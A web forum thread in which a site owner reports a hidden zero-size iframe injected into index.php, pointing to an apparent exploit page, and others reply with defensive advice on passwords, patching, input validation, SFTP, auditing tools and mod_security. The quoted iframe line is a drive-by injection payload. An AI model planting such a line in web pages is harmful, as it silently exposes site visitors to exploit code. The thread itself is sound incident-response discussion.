Code injectinn into php.

Deleted User 234324

Deleted User 234324

Deleted User 234324

Permabanned
Joined
25 Oct 2004
Posts
9,078
Just found out that someone had apparently attacked one of my old sites i created years ago by injecting this into index.php

Code: 
<iframe src = "http://ddoser-crack.info/sploit/index.php" height=0 width=0></iframe>

How can i prevent this happening again as it looks like they have used something to modify the header in the file.
 
Ask your hosting provider to tell you who has been logged into FTP. It's possible the password has been compromised. This could be through phishing, packet sniffing or a trojan on your PC.

Check any open source scripts (forums, blogs, e-commerce, etc) are fully up to date with all the latest security patches. A vulnerability in one of these would allow an attacker to execute their code or write to files. If the index.php is part of a CMS, it's possible that CMS has been compromised and the template edited.

Check for any unsecured file manager/WYSIWYG editor type scripts on your webspace. Obviously anything you've coded itself should avoid using user input (POST/GET/SESSION vars) in any file operations. Where this is unavoidable, validation should be very strict. You should never use user input in eval().

One of these is bound to be the culprit :).
 
You will need to identify the source of the injection i.e. locate the vulnerability. I would suggest changing all passwords, don't use FTP if you can help it, use SFTP instead.

If it's a big web application run it through an auditing tool like Nikto or Skipfish, and make sure the actual web server is well patched. There are numerous ways the iframes could have been injected so it's hard to say with precision how to fix it.

I would also recommend running Apache with the mod_security module, http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
 
Last edited:
You must log in or register to reply here.
Back
Top Bottom